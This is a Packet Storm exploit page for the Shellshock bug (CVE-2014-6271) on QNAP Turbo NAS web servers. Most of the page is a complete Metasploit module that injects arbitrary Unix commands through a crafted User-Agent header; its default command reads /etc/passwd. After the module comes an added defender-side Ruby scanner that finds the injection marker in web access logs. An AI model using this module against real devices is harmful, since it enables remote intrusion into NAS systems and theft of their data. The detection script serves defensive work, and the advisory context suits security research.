QNAP Web Server Remote Code Execution

27 Mar 2015 | Reported by Patrick Pellegrino | Type: packetstorm | Source: packetstormsecurity.com

QNAP Web Server Remote Code Execution via Bash Environment Variable Code Injection (CVE-2014-6271) allows injection of Unix commands that run as the same user that runs the HTTP service on the QNAP system. Affected products include all Turbo NAS models except TS-100, TS-101, TS-200. The exploit was tested on TS-1279U-RP.

```ruby
# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino | [email protected] [work] / [email protected] [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection',
      'Description' => %q{
        This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system.
        Affected products:
        All Turbo NAS models except TS-100, TS-101, TS-200
      },
      'Author'      => ['Patrick Pellegrino'], # Metasploit module | [email protected] [work] / [email protected] [other]
      'License'     => MSF_LICENSE,
      'References'  => [
        ['CVE', '2014-6271'], # aka ShellShock
        ['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
      ],
      'Platform'    => ['unix']
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Path to CGI script', '/cgi-bin/index.cgi']),
      OptString.new('CMD', [true, 'The command to run', '/bin/cat /etc/passwd'])
    ], self.class)
  end

  # Sends the function-definition string in the User-Agent header and looks
  # for the output of /usr/bin/id in the response body.
  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path),
        'agent'  => "() { :;}; echo; /usr/bin/id"
      })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
      vprint_error("Connection failed")
      return Exploit::CheckCode::Unknown
    end

    if !res
      return Exploit::CheckCode::Unknown
    elsif res.code == 302 && res.body.include?('uid')
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def run
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path),
      'agent'  => "() { :;}; echo; #{datastore['CMD']}"
    })

    # send_request_cgi returns nil when no response arrives, so guard
    # before touching the body.
    if res.nil? || res.body.empty?
      print_error("No data found.")
    elsif res.code == 302
      print_status("#{rhost}:#{rport} - bash env variable injected")
      puts " "
      print_line(res.body)
    end
  end

end
```
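A defender-side companion to the module above, added here as an example and not part of the original page or the author's repository: it scans web-server access logs for the `() {` function-definition marker that the module places in the User-Agent header. It assumes the server writes the Apache/nginx "combined" log format; the log lines, `shellshock_hits` and the other names are constructed for illustration.

```ruby
# Added example, not part of the original module. Log lines are constructed.
# Assumed log format (Apache/nginx "combined"):
#   host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = /\A(?<host>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<request>(?:[^"\\]|\\.)*)" (?<status>\d{3}) \S+ "(?<referer>(?:[^"\\]|\\.)*)" "(?<agent>(?:[^"\\]|\\.)*)"\s*\z/

# CVE-2014-6271: bash imports an environment value beginning with "() {" as a
# function definition. CGI exports request headers as HTTP_* variables, so the
# marker has no business in a request line, Referer or User-Agent. The pattern
# is looser than bash's own prefix test (any position, optional whitespace).
FUNC_DEF = /\(\)\s*\{/

# Returns one hash per suspicious field found in the given log lines.
def shellshock_hits(lines)
  lines.each_with_object([]) do |line, hits|
    line = line.chomp
    m = COMBINED.match(line)
    if m.nil?
      # A line that does not parse must not hide a hit: scan it whole.
      hits << { host: nil, status: nil, field: 'raw', value: line } if line =~ FUNC_DEF
      next
    end
    %w[request referer agent].each do |field|
      next unless m[field] =~ FUNC_DEF
      hits << { host: m[:host], time: m[:time], status: m[:status].to_i,
                field: field, value: m[field] }
    end
  end
end

# Constructed sample input (documentation address ranges).
SAMPLE_LOG = [
  '192.0.2.10 - - [27/Mar/2015:10:00:01 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" 302 212 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
  '198.51.100.7 - - [27/Mar/2015:10:00:05 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" 302 98 "-" "() { :;}; echo; /usr/bin/id"',
  '198.51.100.7 - - [27/Mar/2015:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 1043 "() { :;}; echo" "curl/7.38.0"',
  'truncated entry with () { marker and no quotes'
].freeze

if __FILE__ == $PROGRAM_NAME
  shellshock_hits(SAMPLE_LOG).each do |h|
    puts "#{h[:host] || '?'} field=#{h[:field]} status=#{h[:status]} #{h[:value].inspect}"
  end
end
```

A hit in the log shows only that the request was sent; whether the command ran depends on the bash version behind the CGI script, so follow up on the host itself.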